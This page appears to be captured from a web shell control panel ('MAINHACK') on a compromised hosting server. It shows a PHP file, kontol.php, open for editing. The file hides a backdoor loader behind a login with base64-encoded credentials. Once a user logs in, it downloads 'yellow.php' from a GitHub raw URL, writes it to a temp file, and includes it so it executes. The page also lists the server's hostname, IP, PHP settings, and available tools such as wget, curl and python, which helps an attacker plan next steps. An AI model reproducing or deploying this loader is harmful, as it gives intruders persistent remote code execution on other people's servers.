[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: kontol.php
<?php if (basename($_SERVER['SCRIPT_FILENAME']) === basename(__FILE__)) { header('HTTP/1.0 403 Forbidden'); exit('Access denied.'); } ?> <?php session_start(); $encoded_user = 'bGFuY2Vsb3Q='; // base64_encode('crowdead212') $encoded_pass = 'UGVkYW5na2VhZGlsYW42OA=='; // base64_encode('$6ghsujGg652HbHhJkKH86&hsjj') $username = base64_decode($encoded_user); $password = base64_decode($encoded_pass); if (!isset($_SESSION['logged_in'])) { if ($_SERVER['REQUEST_METHOD'] === 'POST') { $input_user = trim($_POST['username'] ?? ''); $input_pass = trim($_POST['password'] ?? ''); if ($input_user === $username && $input_pass === $password) { $_SESSION['logged_in'] = true; header("Location: " . $_SERVER['PHP_SELF']); exit; } else { $error = "Username atau password salah!"; } } ?> <!DOCTYPE html> <html> <head><title>Login</title></head> <body> <h2>Login</h2> <?php if (isset($error)) echo "<p style='color:red;'>$error</p>"; ?> <form method="POST"> <label>Username: <input type="text" name="username" required></label><br><br> <label>Password: <input type="password" name="password" required></label><br><br> <input type="submit" value="Login"> </form> </body> </html> <?php exit; } function ambil_konten($url) { $konten = @file_get_contents($url); if ($konten !== false) return $konten; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 10); $konten = curl_exec($ch); $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpcode !== 200 || empty($konten)) return false; return $konten; } $url = "https://raw.githubusercontent.com/ressasantikaa-rgb/newphp86/main/yellow.php"; $konten = ambil_konten($url); if ($konten === false) { die("Gagal mengambil data dari URL."); } try { ob_start(); $tmp = tempnam(sys_get_temp_dir(), "kode_"); file_put_contents($tmp, $konten); include $tmp; unlink($tmp); ob_end_flush(); } catch (Throwable $e) { ob_end_clean(); die("Terjadi kesalahan saat eksekusi kode: " . $e->getMessage()); } ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server306.web-hosting.com
Server IP: 192.64.117.220
PHP Version: 8.2.31
Server Software: LiteSpeed
System: Linux server306.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
HDD Total: 138.28 GB
HDD Free: 102.38 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: awodbsau
User ID (UID): 4522
Group ID (GID): 4521
Script Owner UID: 4522
Current Dir Owner: 4522